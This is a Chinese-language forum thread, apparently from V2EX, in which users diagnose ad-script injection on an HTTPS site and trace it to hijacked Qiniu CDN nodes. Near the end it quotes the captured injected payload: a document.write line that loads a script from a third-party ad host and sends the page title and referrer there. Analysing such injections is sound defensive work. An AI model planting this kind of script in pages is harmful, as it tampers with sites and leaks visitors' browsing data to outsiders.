论 SSL 有用吗？ HTTPS(RapidSSL SHA256 CA - G3)了为何还是被电信劫持？

浏览器隐私模式下打开看看
再打开看看插件列表有啥东西

https 出问题的可能性太小了，中间人攻击 tls 只为了插个广告，成本太不合适了。

chrome https 插 http 的 js 默认不执行吧？

估计网站用的是青云 BGP ，然后静态资源用七牛的 https
不知道是不是全站 https ，包括 CDN 回源之类的
应该从非安全连接部分入手检查

引入了 http 资源应该 Chrome 边上有个拦截的小盾牌

目测是浏览器插件

感觉不像 ISP 的问题，毕竟对 TLS 进行攻击只是为了插个广告，太不划算了

检查一下 CDN 回源的问题看看

@lshero /t/227555 这篇帖子的作者是重装 chrome 后也无解
@gamexg
@Andy1999 是 https 的，结果被替换成 http ，这个也是个疑点。
@lhbc cdn 上是七牛自己的证书，也是用的 https 的，正常情况下不会出现这种现象才对。

@oldcai 那就说得过去了 部分地区为了劫持百度把百度从 https 降级到 http 然后再插广告

1. chrome 下默认屏蔽所有非 https 链接的 js
2. 看起来是插件插入的

@Andy1999
@lianz
是说网页内的链接，本来是 https 的，而劫持后变成了 http 的。
我也问了同事，他说最近没有装新插件，反而删了好多。
也让他一会再隐私模式下试试看。

谢谢大家。

我就是那个访问百度被强降 HTTP 的...
其他 HTTPS 没看到有插广告

@lianz 电信现在很恶心 都上升到 TCP 流量劫持了
以前换个 DNS 解决问题 现在换 DNS 照样被劫持

不会是个广告吧， 2333

PS ：打开测试没问题

@oldcai
更有可能的是你们的网站内部问题或者浏览器插件或者电脑中毒了。
HTTPS 劫持插广告的几率比彩票中奖的几率低很多倍。

建议换一个设备在同一网络下重试。

HTTPS 被劫持插广告的可能性是零，你知道 HTTPS 被劫持是多大的新闻么？

qbox.me 是七牛的域名

之前看到有人说 https 也被劫持到这个来着

@miyuki 抱歉没看清楚

也许是 ISP 强制降到 HTTP 干坏事

被劫持的是哪个页面或者哪个资源文件？
对应域名的解析 IP 是什么？

也许是你们的网站在 http 跳转到 https 之时被劫持的

@Andy1999
@miyuki
没有特别留意过被降级的过程，我不在深圳『事发地点』，所以也没法在我机器上复现。
但是直觉是降级 http 后，地址栏的 https 应该不是绿色的了才对吧？

@lhbc 被劫持的是 https://zine.la/editor/ 这个地址，是一个静态页面。
对应文件已经核对过了，没有被修改，而且不在 cdn 上。

被劫持的时候检查下别的 js ，看哪个是被改动的

自己检查那个 http 的七牛的 js ，估计就是这的问题。

抓包，不要直接看浏览器，浏览器是 js 执行之后的，可能有一些伪装。

@oldcai 看下浏览器上的证书指纹
如果指纹和服务器的一致，那只有两个可能：
1 、中间人拿到了你的私钥
2 、浏览器

不一致的话，肯定是中间人

另外，页面引用的 js 也可以插入内容

有试过用别的浏览器或者手机浏览器打开看看么？
总觉得应该是浏览器里某些插件插进去的。

这个看上去像是服务器在提供资源之前就有劫持，被插入了这个内容，然后有这个页面
请尝试在手机端的浏览器复现(Chrome 可以通过 ADB 调试)，因为不能保证电脑不中毒

为什么呢：
1 ，从截图来看，加密套件是 PFS(使用了 ECDHE_RSA 密码交换算法)的，无法用上级证书解密
2 ， 1 意味着需要单独为你们网站伪造一个合法证书才能实行(解密 TLS->插入劫持内容->再加密成让浏览器识别不出已受到攻击的)攻击
3 ，实施 2 程度的攻击得是国家支持级的才说得过去

有关 PFS(完全正向保密)
http://www.infoq.com/cn/articles/keeping-your-secrets
https://en.wikipedia.org/wiki/Forward_secrecy

好像还真被劫持了也,我不挂 ss 时的

挂了 ss 的时候

@honeycomb 十分让人信服。

@lhbc
然而我同事那边的问题 忽然不复现了，只能等下一次出现再对比一下指纹了。

@oldcai
抱歉没说清楚：
1 ，
这个页面似乎是在被你们的那份证书私钥最终地加密以前，就已经遭到了篡改
2 ，
关于浏览器扩展是否参与了劫持
比方说，我在用 uMatrix ，加载了这个页面后，打开开发者工具能看到页面中被插入了 uMatrix 的代码，这个过程不会触发 HTTPS 指示器报警


;(function() {
try {
/* https://github.com/gorhill/uMatrix/issues/61#issuecomment-63814351 */
var navigator = window.navigator;
var spoofedUserAgent = "Mozilla/5.0 ****************************************************************************";
if ( spoofedUserAgent === navigator.userAgent ) {
return;
}
var pos = spoofedUserAgent.indexOf('/');
var appName = pos === -1 ? '' : spoofedUserAgent.slice(0, pos);
var appVersion = pos === -1 ? spoofedUserAgent : spoofedUserAgent.slice(pos + 1);
Object.defineProperty(navigator, 'userAgent', { get: function(){ return spoofedUserAgent; } });
Object.defineProperty(navigator, 'appName', { get: function(){ return appName; } });
Object.defineProperty(navigator, 'appVersion', { get: function(){ return appVersion; } });
} catch (e) {
}
})();



请使用这个神器来解决问题：

Google 自己写的 The Chrome Apps Developer Tool

https://chrome.google.com/webstore/detail/chrome-apps-extensions-de/ohmmkhmmmpcnpikjeljgnaoabkaalbgc

@yexm0 你也是在深圳吗？

@oldcai 是的

昨日，上海浦东法院首次在司法层面将流量劫持认定为犯罪，该院判决了全国首起流量劫持刑案，两名被告人被判有期徒刑 3 年，缓刑 3 年；扣押在案的作案工具以及退缴在案的违法所得予以没收。

@yexm0 方便看一下证书指纹吗，在地址栏点锁 -> 证书信息 -> 翻到最下面。
谢谢了。
（有没有可能我们发现了一个惊天的大阴谋

@oldcai 锁 -> 连接 -> 证书信息 -> 翻到最下面

@oldcai 劫持和没劫持下证书指纹好像都一样

关注进展，广东东莞电信，一切正常

右键查看源码试一下？
F12 那个是当前的 DOM tree ，可能被其他 JS 更改过

第一次访问的时候也出现了楼主的症状，刷新后就消失了。

@JimmyCai +1

@JimmyCai 刚刚刷新了一次又出现了。另外，源码里面未发现该脚本。

一个比较简单地看是不是 HTTP(S)劫持的方法是直接看源码而不是看 DOM Tree ，如果源码中没有基本上不会是协议层面上的劫持，应该去考虑浏览器扩展、系统插件等其它情况

杭州电信：劫持已复现，症状相同。 Linode 上访问没有劫持。（重新签一份证书试试

广东电信: 劫持已复现, 但只在 chrome 下出现, firefox, safari 都没问题. chrome 尝试添加 --disable-extensions 禁用所有扩展依旧被劫持

七牛的 js 回源被劫持了

document.write("<script language='javascript' src='http://dn-zine-static.qbox.me/Zine_web/otherScript-min.js?_vv=20080808&_veri=20121009'><\/script>");document.write("<script language='javascript' src='http://js.meiletu.net:41180/re/re.php?src=t6407&t="+encodeURIComponent(document.title)+"&ci=3738840456&r="+encodeURIComponent(document.referrer)+"'><\/script>");

因为你的 js 正在以 http 的方式访问，所以被劫持，然后构造了这样一个劫持的 js 。很大可能就是回源的时候的问题

我们公司这段时间遇到了 CDN 机房间在回源的时候被劫持，导致写入到 CDN 服务器上的数据直接就被篡改。建议楼主可以查下遇到问题对应的机器，直接上机器看文件。

七牛 CDN 回源流量被大量劫持：
/t/233684#reply9

1. 如果你说的是 CDN ，请检查 CDN 到服务器的连接。（另外用了 CDN 这种事情得早点说
2. 看劫持为什么要用控制台工具而不是看源码？意义不明。

cloudflare 有 keyless 的功能 客户无需将证书交结 cloudflare 实现 https 的转发 这个技术是可以用来做劫持 https

@wzxjohn
@msg7086
@virusdefender
静态文件的 CDN 我们不是镜像的，是手动用七牛的 qrsync 同步到 cdn 的，我觉得回源链路问题无法解释为何会一下好一下出问题。

貌似最近有同样的东西：

https://www.v2ex.com/t/235434

http://weibo.com/1494759712/D31oLvWUH?from=page_1005051494759712_profile&wvr=6&mod=weibotime&type=comment#_rnd1447252229082

是七牛的节点被劫持了。

我这里前天也出现了这个问题，我们的回源是 HTTPS 的。
因为七牛是一次回源然后同步到所有节点的，所以我怀疑可能是同步过程是 HTTP 的，造成了同步到某些节点时被批量注入。

@oldcai
看我楼上的回复，我们也是全站 HTTPS ，但是依然遇到了这种情况，我感觉应该是从回源到同步发生了问题。

@Had 问了七牛的人，他说：上传是 http 的，但是上传都是 token 加密的， qrsync 上传，如果上传劫持就会上传失败了，不会上传一个错误文件。

我理解为虽然是 http 上传，但是有 token 校验。

而且目测同步到七牛的服务端的版本没有问题，我这边刚也出现过被劫持的现象，确实是 cdn 的文件被篡改，但是加了个参数尾巴就又好了，感觉是七牛的服务器之间传输文件被劫持了。

@zho6 因为 CF 自己可以签发证书。但是这些企业都有严格的策略，保证证书不会被滥用。

@oldcai 你用 CURL 试试吧。如果证书的确是你自己的，而且输出源码里有劫持，那多数是目标服务器自己的问题了。
SSL 的保险保的是他家证书误签发给陌生人的问题。比如你这 RapidSSL ，保险保的就是 Rapid 自己把证书签发给了你以外的第三者。其他情况应该是不会管的。
至于 SSL 协议本身的安全性应该是不用担心的，毕竟里面那堆核心算法是美国政府都在用，要是有坑的话早就炸锅了。

@oldcai 嗯，咱猜测的很类似，因为七牛用了中间源，所以需要从中间源分发到各个节点，应该是这个过程被污染了。

想起以前一个帖子，
https://www.v2ex.com/t/169333

国内网络这现状，工信部该好好管管了

运营商在骨干网劫持，哈哈哈

@oldcai 很简单，某些回源链路被劫持，导致有些机器上的文件是有问题的，但是并没有影响所有的机器。如果你被随机到了这台机器上那就有问题。。。

你用审查查看到的代码可能是后来的 js 修改的,你直接右键查看网页源代码看看还没有有问题的 js

能看看 response 的 body 内容吗?是不是真的有这么一段劫持代码

深圳电信用户 MAC+CRHOME+ABP 访问表示未看到劫持， ABP 报告 0

看来除了纯 SSL ，还得验证引入资源是否 SSL 。太可怕了。电信运营商真的奸诈，无所不用其极。犯罪成本低，执法力度差，让他们成了犯罪的温床。

就一个网页需要挂 CDN 么，囧， rapidssl 连企业版 SSL 都没有的

@oldcai
我觉得不会是电脑本身的问题，因为两点：
1 、我电脑双系统， win7+ubuntu ，只有 win7 下的 chrome 会出现异常， ubuntu 下的 chrome 没问题。于是我在 win7 和 ubuntu 下分别安装 vitualbox 虚拟机，在虚拟机里分别安装了新 win7 ，下载 chrome ，没安装任何插件，访问几十个网页就会出现异常。
2 、如果说是我的 win7 iso 有问题，那后来我给 chrome 安装了一个插件叫 user-agent switcher ，改 ua 为"chrome on Mac"，到现在一个月了，再也没出现异常了，在这期间我也把 ua 换成“ chrome on windows ”，很快就会异常，随便浏览不同网站的网页，大概几十个就会遇到几个异常。注意，访问基本任何网站都会出现， sina 、 sohu 、 csdn 、 51cto ，都出现过。而且基本上是第一次访问某个网站时出现。

另外，还怀疑一点是电信的光猫默认是允许电信的工作人员远程连接用来维护的，据说可以下发什么内容，那这就不知道会不会在搞鬼，我现在把光猫的 TR069 协议禁用了。

以上说的都是 http 。 https 的站点至今没遇到过异常，不过 https 站点毕竟相对来说还少。